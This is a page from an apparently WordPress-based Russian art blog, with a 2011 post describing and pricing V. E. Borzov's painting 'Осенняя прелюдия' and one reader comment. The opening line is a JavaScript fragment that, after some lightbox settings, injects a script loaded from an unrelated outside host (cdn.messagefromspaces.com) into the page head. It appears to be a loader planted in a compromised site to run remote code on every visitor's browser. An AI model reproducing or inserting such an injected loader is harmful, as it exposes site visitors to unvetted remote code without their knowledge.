, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Картина «Осенняя прелюдия»

Автор: Юлия | 11 Апр 2011

Представляю Вам картину "Осенняя прелюдия" художника Владимира Евгеньевича Борзова. Тем, кто заскучал или устал от обыденности и серости реального мира, будет вдвойне интересно соприкоснуться с миром удивительных, запоминающихся образов, порожденных богатой фантазией автора.

Обратите внимание, какое динамичное действие, разворачивается перед нами на картине "Осенняя прелюдия". Каждый, даже незначительный объект, лишен статичности, скованности в рамках изображения. Кажется, что силуэты людей словно замерли на доли секунды, и вот-вот снова придут в движение, а предметы необычной формы, чем-то напоминающие елочные украшения, свободно взмоют вверх. Туда, где крона могучего дерева все ближе и ближе к огромной воронке, напоминающей то ли вихрь, то ли смерч, то ли водоворот…

Возможно, художник хочет напомнить нам, что все мы рано или поздно точно также исчезнем в вихре неумолимого времени? И осенняя пора выбрана неслучайно. Недаром в какой-то возрастной период говорят о наступлении "осени жизни".

Но несмотря на лирическое настроение, навеваемое подобными ассоциациями, цветовое решение картины "Осенняя прелюдия" не выглядит скучным или тоскливым. Как и подобает осенней поре, мы видим настоящую разноцветную феерию.

Картина "Осенняя прелюдия" – это соединение причудливых образов с богатством красок. Не в этом ли состоит секрет того, что работу художника Владимира Евгеньевича Борзова можно рассматривать часами, задаваясь все новыми вопросами и увлекаясь бесконечным поиском ответов на них?

Картина "Осенняя прелюдия", 2007 г. Холст, масло, картина оформлена в багет. Размеры 60 × 50 см. Цена 55 000 руб.

Подписаться на новые картины и статьи Вы можете здесь.

Приобрести картины Вы можете в нашем интернет-магазине.

Темы: Галерея картин художников, Интернет - Магазин, Критика | 1 отзыв »

Один отзыв на “Картина «Осенняя прелюдия»”

  1. Денис пишет:
    14 Апр 2011 в 19:21

    Красивая картина, очень динамичная и необычная! Когда смотришь на нее не можешь оторвать взгляд, соглашусь с автором, что создается ощущение что картина словно замерла на некоторое время, что бы мы смогли рассмотреть все ее тонкости!

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress